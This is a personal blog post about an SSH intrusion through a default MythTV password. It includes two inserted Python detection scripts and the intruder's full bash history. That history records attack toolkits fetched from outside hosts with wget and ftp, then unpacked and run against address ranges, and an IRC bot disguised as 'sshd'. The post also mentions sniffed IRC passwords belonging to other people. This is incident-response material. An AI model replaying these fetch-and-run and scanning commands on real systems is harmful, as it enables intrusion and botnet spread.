I woke up on the couch very early this morning, like around 4:30ish, after falling asleep trying to watch Kill Bill 1. I decided in my half-dazed state to check the disk space on one of my servers before going to bed, because it's been getting pretty close to full. I logged into the machine and typed last. Up came a login by user mythtv from a few days ago.
That's funny, because I sure didn't log in as mythtv any time recently, and I'm ostensibly the only one allowed to log into this machine.
mythtv was not logged in at that moment. But there was an sshd process running owned by mythtv. I checked the auth log, and sure enough, mythtv had logged in with a password. It was not in the middle of any other break-in attempts; just one successful login. It was probably because I, ahem, left the password at the default. I would not have done that intentionally, but I might have done it nonetheless.
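The auth-log check described above, written out as an added example that is not part of the original post: it flags any accepted SSH login by an account outside an allow-list, and records how many failed attempts preceded it from the same address, so a first-try success with a service account's default password stands out. The allow-list name and the log lines are constructed.

```python
"""Added example, not from the original post: flag SSH logins by accounts that
should never log in interactively, from sshd's auth-log lines.  Assumptions:
the classic syslog line format shown below, and an allow-list of the humans who
may log in (the single placeholder name here is mine).  Sample lines are constructed."""
import re
from collections import Counter

# e.g. "Mar  3 02:14:07 myth sshd[2310]: Accepted password for mythtv from 198.51.100.7 port 4321 ssh2"
LOGIN_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")

ALLOWED_USERS = {"adminuser"}   # placeholder: the one person who should log in

def scan_auth_log(lines, allowed=ALLOWED_USERS):
    """Return (findings, failures): findings lists accepted logins by accounts
    outside the allow-list; failures counts failed attempts per source address,
    so a success with zero prior failures (a known default password, not a
    brute force) stands out."""
    findings, failures = [], Counter()
    for line in lines:
        m = LOGIN_RE.search(line)
        if not m:
            continue
        if m["result"] == "Failed":
            failures[m["src"]] += 1
        elif m["user"] not in allowed:
            findings.append({"user": m["user"], "method": m["method"],
                             "src": m["src"], "prior_failures": failures[m["src"]],
                             "line": line.strip()})
    return findings, failures

# Constructed sample: one legitimate key login, one default-password login by
# the mythtv service account, and two guesses from an unrelated scanner.
SAMPLE = """\
Mar  1 22:10:01 myth sshd[2001]: Accepted publickey for adminuser from 192.0.2.10 port 51000 ssh2
Mar  3 02:14:07 myth sshd[2310]: Accepted password for mythtv from 198.51.100.7 port 4321 ssh2
Mar  3 02:20:11 myth sshd[2322]: Failed password for invalid user oracle from 203.0.113.9 port 3344 ssh2
Mar  3 02:20:14 myth sshd[2322]: Failed password for invalid user test from 203.0.113.9 port 3345 ssh2
""".splitlines()

if __name__ == "__main__":
    found, fails = scan_auth_log(SAMPLE)
    for f in found:
        print(f"ALERT: {f['user']} accepted via {f['method']} from {f['src']} "
              f"after {f['prior_failures']} failed attempts from that address")
```

Feed it the real file with `scan_auth_log(open("/var/log/auth.log"))`; accounts like mythtv that exist only to run a service should simply never appear in the findings.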
So, long story short, someone got access to one of my machines for a few days. They didn't do anything to the machine, and I'm pretty certain after doing standard verification things that I was not rooted. They didn't send any mail out. They just ran an instance of EnergyMech, which they had renamed to sshd, probably for the same reason that they installed all this stuff in .... I admit I missed it the first time looking. The instance spawned 3 bots, who then logged into 3 different IRC servers.
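A check for the trick described above, added here as an example that is not from the original post: a process whose name matches a system daemon but whose executable or working directory lives under /tmp or inside a dot-only directory such as "..." is flagged. The expected daemon paths and the sample process records are my assumptions; on a Linux box the same check can be run over the live /proc.

```python
"""Added example, not from the original post: flag a process that is named like
a system daemon but runs from a scratch or hidden directory, as the renamed
EnergyMech ('sshd' under /tmp/.../) did.  Assumptions: the expected paths below,
and that /tmp, /var/tmp and dot-only dirs ('...') never host a real daemon."""
import os, re
EXPECTED_EXE = {"sshd": "/usr/sbin/sshd", "httpd": "/usr/sbin/httpd"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOT_ONLY = re.compile(r"(^|/)\.{2,}(/|$)")   # a path component such as '...'

def suspicious_path(path):
    """Return the reasons a process's exe or cwd looks wrong ([] if fine)."""
    checks = [(path.startswith(SCRATCH_DIRS), "under scratch directory"),
              (DOT_ONLY.search(path), "hidden dot-only directory component")]
    return [why for hit, why in checks if hit]

def check_process(rec):
    """rec has pid, comm, exe, cwd as /proc reports them. Returns findings."""
    findings = []
    expected = EXPECTED_EXE.get(rec["comm"])
    if expected and rec["exe"] != expected:
        findings.append(f"'{rec['comm']}' runs from {rec['exe']}, expected {expected}")
    for field in ("exe", "cwd"):
        findings += [f"{field} {rec[field]}: {why}" for why in suspicious_path(rec[field])]
    return findings

def collect_from_proc():
    """Live records from /proc (Linux); entries we cannot read are skipped."""
    recs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            recs.append({"pid": int(pid),
                         "comm": open(f"/proc/{pid}/comm").read().strip(),
                         "exe": os.readlink(f"/proc/{pid}/exe"),
                         "cwd": os.readlink(f"/proc/{pid}/cwd")})
        except OSError:
            continue
    return recs

# Constructed records: the real sshd, and a bot renamed to sshd as in the post
SAMPLE = [
    {"pid": 612, "comm": "sshd", "exe": "/usr/sbin/sshd", "cwd": "/"},
    {"pid": 4242, "comm": "sshd", "exe": "/tmp/.../http/kids/sshd", "cwd": "/tmp/.../http/kids"},
]

if __name__ == "__main__":
    for rec in SAMPLE + (collect_from_proc() if os.path.isdir("/proc") else []):
        for finding in check_process(rec):
            print(f"pid {rec['pid']}: {finding}")
```

Run it as root so /proc/PID/exe links for other users' processes are readable; a daemon name with an exe under a scratch directory is exactly what `ps aux` alone does not show you.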
Since they didn't seem to be doing anything harmful, and because I was curious and wanted to learn from this incident, I ran tethereal all day and recorded their traffic. I now have an awful lot of people's (or other bots'?) Undernet passwords, and some conversations in Romanian. I'm not sure yet what to do with this information. If any of you speak what they speak in Romania and would like to translate some log files, let me know.
I'll post some more details about this later. Some of you will find the ~/.bash_history file entertaining, so I'll include that here. I also killed and restarted the EnergyMech in debug mode, and logged that for a while.
The question remains how they knew right off the bat that I was running mythtv. I have three theories at the moment. One is that they could be combing freenode's #mythtv-users channel for IPs, because it is publicly logged, and I have been there before (although normally my IP is obscured by my cloak). Second is that there has been some kind of compromise that allows them to monitor connections to the servers that myth boxes talk to in order to fill their database with channel info. Third is that they just got really lucky, and got in on the first try with a list of default users and passwords. I suppose there is the fourth possibility that they doctored the logs and actually exploited something to get in, but it doesn't look like that to me.
Obviously I will comb the bot and traffic logs for IPs and try to notify people that their machines have been compromised. Anything else I should do?
You'll see that they did some port scanning too. I'm not sure yet what all these strangely named binaries do, other than scan. They probably ran some more cracking attempts on other machines. They tried to set up a PHP cgi-bin script that lets them execute shell commands.
Among the artifacts they left lying around are files of common passwords and usernames. But mythtv does not appear in any of these files.
They also ran mythtv-setup, which is downright bizarre. Maybe they were expecting X forwarding to be enabled (it's not). If that's the case, then that lends credibility to the theory that this is a mythtv-specific effort.
w passwd uname -a ls /etc/rc.d/init.d/httpd status /etc/rc.d/init.d/sendmail status php -v ps aux cd .X11-unix cd X11 cd /tmp/.X11-unix ls tar xzvf boti.tgz rm -rf boti.tgz cd mech mv mech httpd export PATH=:PATH httpd uname -a w mkdir public_html ls cd public_html /etc/rc.d/init.d/sendmail status /etc/rc.d/init.d/httpd status uname -a ps aux w mythtv-setup w w uname -a cd /tmp mkdir ... cd ... ftp 18.104.22.168 tar xzvf boti.tgz rm -rf boti.tgz cd mech mv mech httpd export PATH=:PATH httpd wget www.fpt.uv.ro/scan/rooteam.tar.gz cd /tmp wget www.fpt.uv.ro/scan/rooteam.tar.gz tar -zxvf rooteam.tar.gz cd rooteam chmod +x * ./auto mv unix assh chmod +x * ./211 w cd /tmp ls cd rooteam ls rm -rf 211 211.21.find.22 chmod +x * ./unix 24.16 ./assh 24.16 ./assh 24.17 ./assh 24.18 ./assh 24.19 ./assh 24.20 ./assh 24.21 ./assh 24.22 ./assh 24.23 ./assh 24.24 ./assh 24.25 ./assh 24.26 ./assh 24.27 ./assh 24.28 ./assh 24.29 ./assh 24.30 ./assh 24.31 ./assh 24.32 ./assh 24.33 ./assh 24.34 ./assh 24.35 ./assh 24.36 ./assh 24.37 ./assh 24.38 ./assh 24.39 ./assh 24.40 ./assh 24.41 ./assh 24.42 ./assh 24.43 ./assh 24.44 cd /tmp ls rm -rf rooteam rm -rf rooteam.tar.gz wget www.fpt.uv.ro/scan/ssteam2.tgz tar -zxvf ssteam2.tgz cd ssteam2 chmod +x * ./start 66.92 ls ./samba ls ./samba 200.3 ./o0o ./o0o 200 ./o0o 200.3 cd /tmp ls rm -rf ssteam2 ssteam2.tgz wget www.fpt.uv.ro/scan/madiceman.tgz tar -zxvf madiceman.tgz cd madiceman chmod +x * ./start 207.0 ./start 207.1 ./start 207.2 ./start 216.69 ./start 59.120 ./start 59.121 ./start 193.254 ./start 211.234 ./start 211.235 ./start 61.74 ./start 151.47 ./start 193.147 ./start 205.95 ./start 138.217 cd /tmp ls rm -rf madiceman madiceman.tgz cd /var/tmp ls wget www.mihai22.as.ro/prv8.tgz tar -xzvf prv8.tgz cd ssh ./scan 67,0 ./scan 67.0 ./scan 66.90 ./scan 216.130 ./scan 206.212 ./scan 200.118 ./scan 66.130 uname -a ps aux w cd /tmp ls wget franck.lydo.org/wtf.tar tar xvf wtf.tar cd wtf ./wtf 62.95 ./wtf 212.174 ./wtf 212.175 ./wtf 212.176 
./wtf 212.177 ./wtf 83.146 ./wtf 83.147 ./wtf 137.132 ./wtf 137.133 ./wtf 137.134 ./wtf 137.135 ./wtf 137.136 ./wtf 169.55 w uname -a ps aux passwd kill -9 29638 cd /tmp mkdir ... cd ... ls rm -rf mech wget www.ploiesti.cc/linux.tar.gz tar -zxvf linux.tar.gz cd http cd kids mv mech sshd chmod +x * PATH="." sshd cd /tmp wget www.ploiesti.cc/gov.tar tar xvf gov.tar rm -rf gov.tar cd gov chmod +x * cat /proc/cpuinfo ./gov 61.150 ./gov 61.151 ./gov 61.152 ./gov 61.153 ./gov 61.154 ./gov 61.155